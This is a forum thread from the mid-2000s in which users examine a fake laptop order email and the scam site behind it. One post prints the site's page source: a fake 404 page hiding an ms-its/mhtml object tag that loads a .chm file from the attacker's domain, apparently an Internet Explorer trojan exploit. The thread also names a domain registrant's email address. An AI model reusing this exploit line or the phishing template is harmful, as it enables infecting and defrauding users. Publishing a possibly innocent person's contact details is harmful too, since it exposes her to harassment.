Another wierd one...!
 

I've just had this e-mail turn up:

* * * * *

Thank you for your order!

You order summary:

IBM ThinkPad R50 Intel Pentium 1700 Mhz
512Mb RAM, 40 Gb Hard Drive, 15 " TFT XGA, 64Mb Shared Graphics, MS Works 7.0 Software, 5 x USB Connections, Windows XP Home Edition,
1 Year Free Warranty

Your bank account is billed for:

£1099.9 9 (inc. VAT)

Your order would be shipped to the address confirmed at order.
To track your order visit:

http://sunairthebest.org/index.html?...er=29992kkE999

To cancel or delay the order visit:

http://sunairthebest.org/index.html?...er=29992kkE999


Thank you for choosing Sun Light Electronics!

SunLight Electronics
London UK
http://sunairthebest.org/

* * * * *

Now I, of course, haven't ordered this and I presume it's some sort of scam, but the site has already been deleted, so I've no idea exactly what it was trying to pull.

Anyone seen/ know anything about this one?

Re: Another wierd one...!
 

are you sure that they were genuine links rather than links to .scr files on your local machine. I have had a lot of mails lately with this kind of thing on. I am sorely tempted to open the links you have given... but i think i should resist....!

EDIT: couldn't resist!! page source appears as follows....

<html>
<head>
<title></title>
</head>
<body>
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://sunairthebest.org//main1.chm::/main1.html" type="text/x-scriptlet"></object>
<h1>404 Not found</h1>
<h3>the page is removed for hosting policy violation</h3>
</body>
</html>

Re: Another wierd one...!
 

Ordinarily, I would of said some muppet typed in your address by mistake. (Happens to me a lot, I get loads of e-mails from boards and website services where Grace and Gerry tried to sign up to something), but.... The site seems a bit weird. An electronics company trading as an Org? I've done a whois on it, and it looks a bit suspect. The fact the page has been taken down for a"hosting policy violation" meant it was probably a fake site for fleecing people.

Re: Another wierd one...!
 

It's unlikely that someone would have accidentally typed my affordable leather domain in by mistake!! :)

Yes, I was just wondering exactly what the scam was. I figured that because it's got the "stop" address, it's maybe trying to confirm addresses for future spam, but I don't know.

Re: Another wierd one...!
 

I suppose whatever nefarious act it was doing, it's finished with now, because the host company has pulled it. However, if you email hillaryjknowles@yahoo.co.uk and ask her reeeeeally nice, she might tell you :)

Re: Another wierd one...!
 

or we could phone her ... anyone dare? :D

Re: Another wierd one...!
 

Don't forget that spammers will often fake name/details of a company purely to get innocent businesses into trouble.

See the 5th post on my spam fighting thread where "Joe Jobbing" is explained :

http://www.cableforum.co.uk/board/sh...ad.php?t=10441

Simply doing a WHOIS on a domain, without checking the email header will often lead you to the innocent party.

* I'm not saying that this is the case for the above situation, just that it's worth keeping in mind when investigating spam.

Re: Another wierd one...!
 

A follow up to this:

http://www.theregister.co.uk/2004/05...er_viral_scam/

Apparently it's an attempt con people into allowing a trojan onto their computer to exploit a new IE vuln.

Since I use Netscape I'm not worrying but if anyone who uses IE did get to look at the site before it was pulled they'd better do a virus check.